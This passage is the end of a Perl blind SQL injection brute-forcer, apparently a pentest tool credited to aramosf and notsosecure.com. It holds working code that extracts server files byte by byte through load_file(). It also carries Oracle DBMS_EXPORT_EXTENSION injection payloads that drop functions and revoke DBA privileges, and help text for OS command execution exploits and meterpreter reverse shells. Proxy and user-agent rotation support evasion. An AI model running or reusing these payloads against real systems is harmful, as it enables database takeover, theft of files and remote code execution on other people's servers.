1649.     if (-e "$lget" && ! $start) {
1650.         $rsize = -s "$lget";
1651.         print "Error: file ./$lget exists.\n";
1652.         print "You can erase or resume it with: -start $rsize\n";
1653.         exit 1
1654.     }
1655.     my ($i,$fsize);
1656.     $sql = "mid(length(length(load_file($fstr))),1,1)";
1657.     my $lng .= getbyte($sql);
1658.     for ($i=1;$i<=$lng;$i++) {
1659.         my $find = 0;
1660.         $sql = "mid(length(load_file($fstr)),$i,1)";
1661.         $fsize.=getbyte($sql);
1662.     }
1663.  
1664.     if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
1665.     $length = $fsize. "bytes";
1666.     # starting ..
1667.     $sql = "load_file($get)";
1668.  
1669.     &bsqlintro();
1670.     # Get file
1671.     #print "---> $lget";
1672.     open FILE, ">>$lget";
1673.     FILE->autoflush(1);
1674.     print "\n--- BEGIN ---\n";
1675.     my ($i,$b,$fcontent);
1676.     $rsize = 1 if $rsize < 1;
1677.     for ($i=$rsize;$i<=$fsize+1;$i++) {
1678.         my $find = 0;
1679.         my ($furl, $b_start, $b_end, $z);
1680.         $sql = "mid(load_file($fstr),$i,1)";
1681.         $fcontent=getbyte($sql);
1682.         print $fcontent;
1683.         print FILE "$fcontent";
1684.     }
1685.     print "\n--- END ---\n";
1686.         close FILE;
1687.     $solution = "success";
1688.     $sql = "$get";
1689. }
1690.  
1691.  
1692.  
1693. &result();
1694.  
1695.  
1696.  
1697. #########################################################################
1698. sub httpintro {
1699.     my ($strcookie, $strproxy, $struagent, $strtime, $i);
1700.     print "--[ http options ]"; print "-"x62; print "\n";
1701.     printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
1702.     if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
1703.     printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
1704.     printf ("%12s %-50s\n","path:", $path);
1705.     foreach (keys %vars) {
1706.         $i++;
1707.         printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
1708.     }
1709.     if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
1710.     printf ("%12s %-50s\n","cookies:",$strcookie);
1711.     if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
1712.     if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
1713.     printf ("%12s %-50s\n","proxy_host:",$strproxy);
1714.     if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
1715.     # timing
1716.     if (! $time && !$rtime) { $strtime="0sec (default)" }
1717.     if ( $time == 0) { $strtime="0 sec (default)" }
1718.     if ( $time == 1) { $strtime="15 secs" }
1719.     if ( $time == 2) { $strtime="5 mins" }
1720.     if ($rtime) { $strtime = "rnd.time:$rtime" }
1721.     printf ("%12s %-50s\n","time:",$strtime);
1722.     printf("\n\nFinding Length of SQL Query....\n");
1723. }
1724.  
1725. sub bsqlintro {
1726.     my ($strstart, $strblind, $strlen, $strmatch, $strsql);
1727.     print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
1728.     if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
1729.     if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
1730.     printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
1731.     printf ("%12s %-15s %11s %-20s\n","database:",$database,"type:",$type);
1732.     if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
1733.     if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
1734.     printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
1735.     if ($amatch eq 1) { $strmatch = "auto match:(!!THIS MAY BE WRONG!!)" } else { $strmatch = "match:"; }
1736.     #printf ("%12s %-60s\n","$strmatch",$match);
1737.     print " $strmatch $match\n";
1738.     print "-"x80; print "\n\n";
1739.     printf "\n Getting Data...\n";
1740. }
1741.  
1742. #########################################################################
1743.  
1744. sub createlwp {
1745.     my $proxyc;
1746.     &getproxy;
1747.     &getuagent if $ruagent;
1748.     LWP::Debug::level('+') if $debug gt 3;
1749.     $ua = new LWP::UserAgent(
1750.         cookie_jar=> { file => "$$.cookie" });
1751.     $ua->agent("$uagent");
1752.     if (defined($proxy_user) && defined($proxy_pass)) {
1753.         my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
1754.         $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
1755.         $proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
1756.     } else { $proxyc = $proxy; }
1757.    
1758.     $ua->proxy(['http'] => $proxyc) if $proxy;
1759.     undef $proxy if $rproxy;
1760.     undef $uagent if $ruagent;
1761. }  
1762.  
1763. sub cookie {
1764.     # Cookies check
1765.     if ($cookie || $cookie =~ /; /) {
1766.         foreach my $c (split /;/, $cookie) {
1767.             my ($a,$b) = split /=/, $c;
1768.             if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
1769.         }
1770.     }
1771. }
1772.  
1773. sub parseurl {
1774.  ###############################################################################
1775.  # Official Regexp to parse URI. Thank you somebody.
1776.     ($scheme, $authority, $path, $query, $fragment) =
1777.         $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
1778.     # Parse args of URI into %vars and @varsb.
1779.     foreach my $varval (split /&/, $query) {
1780.         my ($var, $val) = split /=/, $varval;
1781.         $vars{$var} = $val;
1782.         push(@varsb, $var);
1783.     }
1784. }
1785.  
1786.  
1787. #########################################################################
1788. # Show options at running:
1789. sub banner {
1790.         print "\n // Blind SQL injection brute forcer \\\\ \n //originally written by...aramosf\@514.es  \\\\ \n";
1791.     print " \n // mofified by sid-at-notsosecure.com \\\\ \n // http://www.notsosecure.com \\\\ \n";
1792. }
1793.  
1794.  
1795. #########################################################################
1796. # Get differences in HTML
1797. sub fmatch {
1798.  my ($ok,$rtrn);
1799.  my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
1800.  my ($html_a, $html_b);
1801.  if (lc($method) eq "get") {
1802.     $furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
1803.     $furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
1804.     $html_a = fetch("$furla");
1805.     $html_b = fetch("$furlb");
1806.  } elsif (lc($method) eq "post") {
1807.    $vars{$lastvar} = $lastval . " ${quote}1";
1808.    $html_a = fetch("$furla");
1809.    $vars{$lastvar} = $lastval . " ${quote}0";
1810.    $html_b = fetch("$furla");
1811.    $vars{$lastvar} = $lastval;
1812.  }
1813.  
1814.  
1815.  #print "$html_a";
1816.  #print "$html_b";
1817.  
1818.  if ($html_a eq $html_b) {
1819.   $rtrn = "no vulnerable";
1820.   return $rtrn;
1821.  }
1822.  
1823.  
1824.  my @h_a = split(/\n/,$html_a);
1825.  my @h_b = split(/\n/,$html_b);
1826.  foreach my $a (@h_a) {
1827.     $ok = 0;
1828.     if ($a =~ /\w/) {
1829.         foreach (@h_b) {
1830.             if ($a eq $_) {$ok = 1; }
1831.         }
1832.     } else { $ok = 1; }
1833.    $rtrn = $a;
1834.    last if $ok ne 1;
1835.  }
1836.  return $rtrn;
1837. }
1838.  
1839.  
1840. #########################################################################
1841. # Fetch HTML from WWW
1842. sub fetch {
1843.     #print "fetch: $_[0]\n";
1844.     my $secs;
1845.     if ($time == 0) { $secs = 0 }
1846.     elsif ($time == 1) { $secs = 15 }
1847.     elsif ($time == 2) { $secs = 300 }
1848.     if ($rtime =~ /\d*-\d*/ && $time == 0) {
1849.         my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
1850.         srand; $secs = int(rand($p-$l+1))+$l;
1851.     } elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
1852.         print "You can't run with -time and -rtime. See -help.\n";
1853.         exit 1;
1854.     }
1855.     sleep $secs;
1856.    
1857.     my $res;
1858.     if (lc($method) eq "get") {
1859.         my $fetch = $_[0];
1860.         if ($cookie) {
1861.             $res = $ua->get("$fetch", Cookie => "$cookie");
1862.         } elsif (!$cookie) {
1863.             $res = $ua->get("$fetch");
1864.         }
1865.     } elsif (lc($method) eq "post") {
1866.         my($s, $a, $p, $q, $f) =
1867.         $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
1868.         my $fetch = "$s://$a".$p;
1869.         if ($cookie) {
1870.             $res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
1871.         } elsif (!$cookie) {
1872.             $res = $ua->post("$fetch",\%vars);
1873.         }
1874.     } else {
1875.         die "Wrong httpd method. Use -h for help\n";
1876.     }
1877.     my $html = $res->content();
1878.     return $html;
1879. }
1880.  
1881.  
1882. sub getproxy {
1883.     if ($rproxy && $proxy !~ /http/) {
1884.         my @lproxy;
1885.         open PROXY, $rproxy or die "Can't open file: $rproxy\n";
1886.         while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
1887.         close PROXY;
1888.         srand; my $ind = rand @lproxy;
1889.         $proxy = $lproxy[$ind];
1890.     } elsif ($rproxy && $proxy =~ /http/)  {
1891.         print "You can't run with -proxy and -rproxy. See -help.\n";
1892.         exit 1;
1893.     }
1894. }
1895.  
1896. sub getuagent {
1897.         my @uproxy;
1898.         open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
1899.         while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
1900.         close UAGENT;
1901.         srand; my $ind = rand @uproxy;
1902.         $uagent = $uproxy[$ind];
1903.         chop($uagent);
1904. }
1905.  
1906. sub result {
1907.     print "\r results:\n" ." $sql = $solution\n" if length($solution) > 0;
1908.  
1909.  
1910. if ($end==1)
1911.    
1912. {
1913.     ##### dropping function linxreadfile()
1914. print "\ndropping function sys.LinxReadFile()\n";
1915. my $drop_func=" and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxReadFile'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
1916. my $url_2=$url.$drop_func;
1917. print "\nsending url..\n\n";
1918. my $content = get_or_post($method,$url_2,$cookie,$proxy) ;
1919. die "Couldn't get $url" unless defined $content;
1920.  
1921.  
1922.   if(! ($content =~ m/$match/i))
1923.       {
1924.         print "-----------------------------------------------\n";
1925.     die "ERROR occured !!!...I could not drop the function!!! ...\n";
1926.         print "-----------------------------------------------\n";
1927.         print "cannot proceed";
1928.         exit 0;
1929.     }
1930.  
1931.   else
1932.       {
1933.               print "--------------------------------\n";
1934.               print "No Errors Encountered...Function dropped....\n";
1935.               print "--------------------------------\n";
1936.  
1937.         }
1938.  
1939.  
1940.  
1941. }
1942.  
1943.  
1944. if ($type==3)
1945.     {
1946. ############revoking dba privileges after data extraction############
1947.         print "-----------------------------------------------\n";
1948.  
1949.         print "\nRevoking dba from public\n\n";
1950.  
1951.         print "-----------------------------------------------\n";
1952.  
1953. my $revokedbafrompub=" and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' revoke dba from public'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
1954. my $url_2=$url.$revokedbafrompub;
1955. print "\nsending url..\n\n";
1956. my $content = get_or_post($method,$url_2,$cookie,$proxy) ;
1957. die "Couldn't get $url" unless defined $content;
1958.  
1959.  
1960.   if(! ($content =~ m/$match/i))
1961.       {
1962.         print "-----------------------------------------------\n";
1963.     die "ERROR occured !!!...I could not revoke the permissions, you should contact the client....\n";
1964.         print "-----------------------------------------------\n";
1965.         print "cannot proceed";
1966.         exit 0;
1967.     }
1968.  
1969.   else
1970.       {
1971.               print "--------------------------------\n";
1972.               print "No Errors Encountered...Permissions revoked....\n";
1973.               print "--------------------------------\n";
1974.  
1975.         }
1976.  
1977.  
1978.     }
1979. ############ Type 3 block ends here##################
1980.  
1981.  
1982.  
1983.     #print " total hits: $hits\n";
1984.     my $blah= length($solution);
1985.     if ($blah<2)
1986.     {print "\n !!!!!!Errrrrrrr.. Something is not quite right.. see below!!!!!\n";
1987.      print "-------------------------------------------------------";
1988.      print "\n1 In a string based injection, vulnerable parameter must end with single quote(')\n\t eg. blah.php?id=foo'";
1989.      print "\n2 And don't forget to provide me a unique true response with -match";
1990.      print "\n3 Also Check that the SQL Query you supplied returns only one row\n";
1991.      print "\n4 BTW did you speify the right database (-database)\n";
1992.      print "-------------------------------------------------------\n\n\n";
1993.     }
1994. }
1995.  
1996. sub help {
1997.     &banner();
1998.         print " ---------------------usage:-------------------------------------------\n";
1999.     print"\nInteger based Injection-->$0 - url http://www.host.com/path/script.php?foo=1000 [options]\n ";
2000.     print "\nString Based Injection-->$0 - url http://www.host.com/path/script.php?foo=bar' [options]\n  ";
2001.     print "\n ------------------------------------options:--------------------------\n";
2002.     print " -sql:\t\tvalid SQL syntax to get; version(), database(),\n";
2003.     print "\t\t\(select  table_name from inforamtion_schema.tables limit 1 offset 0)\n";
2004.     print " -get: \t\tIf MySQL user is root, supply word readable file name\n";
2005.     print " -blind:\tparameter to inject sql. Default is last value of url\n";
2006.     print " -match:\t*RECOMMENDED* string to match in valid query, Default is auto\n";
2007.     print " -nomatch:\t string to match in invalid query (must only appear in false scenario)\n";
2008.     print " -start:\tif you know the beginning of the string, use it.\n";
2009.     print " -length:\tmaximum length of value. Default is $default_length.\n";
2010.     print " -time:\t\ttimer options:\n";
2011.     print " \t0:\tdont wait. Default option.\n";
2012.     print " \t1:\twait 15 seconds\n";
2013.     print " \t2:\twait 5 minutes\n\n";
2014.     print " -type:\t\tType of injection:\n";
2015.     print " \t0:\tType 0 (default) is blind injection based on True and False responses\n";
2016.     print " \t1:\tType 1 is blind injection based on True and Error responses\n";
2017.     print " \t2:\tType 2 is injection in order by and group by \n";
2018.     print " \t3:\tType 3 is extracting data with SYS privileges[ORACLE dbms_export_extension exploit]\n";
2019.     print " \t4:\tType 4 is O.S code execution [ORACLE dbms_export_extension exploit]\n";
2020.     print " \t5:\tType 5 is reading files [ORACLE dbms_export_extension exploit, based on java]\n\n";
2021.     print " \t6:\tType 6 is O.S code execution [ORACLE DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit]\n";
2022.     print " \t7:\tType 7 is O.S code execution [ORACLE SYS.KUPP\$PROC.CREATE_MASTER_PROCESS(), DBA Privs]\n";
2023.     print " \t\t -cmd=revshell [Type 7 supports meterpreter payload execution, run generator.exe first]\n";
2024.     print " \t\t -cmd=cleanup [run this after exiting your metasploit session, it will clean up the traces]\n";
2025.     print " \t8:\tType 8 is O.S code execution [ORACLE DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions]\n";
2026.     print " \t\t -cmd=revshell [Type 8 supports meterpreter payload execution, run generator.exe first]\n";
2027.     print " -file:\tFile to read [default C:\\boot.ini] \n\n";
2028.     print " -stype:\tHow you want to execute command:\n";
2029.     print " \t0:\tSType 0 (default) is based on java..will NOT work against XE\n";
2030.     print " \t1:\tSType 1 is against oracle 9 with plsql_native_make_utility\n";
2031.     print " \t2:\tSType 2 is against oracle 10 with dbms_scheduler \n";
2032.     print " -database:\tBackend database:\n";
2033.     print " \t0:\tMS-SQL (Default)\n";
2034.     print " \t1:\tMYSQL\n";
2035.     print " \t2:\tPOSTGRES\n";
2036.     print " \t3:\tORACLE\n";
2037.     print " -rtime:\twait random seconds, for example: \"10-20\".\n";
2038.     print " -method:\thttp method to use; get or post. Default is $default_method.\n";
2039.     print " -cmd:\t\tcommand to execute(type 4 only). Default is \"$default_cmd.\"\n";
2040.     print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
2041.     print " -ruagent:\tfile with random http UserAgent header to use.\n";
2042.     print " -cookie:\thttp cookie header to use\n";
2043.     print " -rproxy:\tuse random http proxy from file list.\n";
2044.     print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
2045.     print " -proxy_user:\tproxy http user\n";
2046.     print " -proxy_pass:\tproxy http password\n";
2047.     print "\n---------------------------- examples:-------------------------------\n";
2048.     print "bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"select table_name from imformation_schema.tables limit 1 offset 0\" -database 1 -type 1\n\n";
2049.     print "bash# $0 -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get \"/etc/passwd\" -match \"foo\"\n";
2050.     exit(1);
2051. }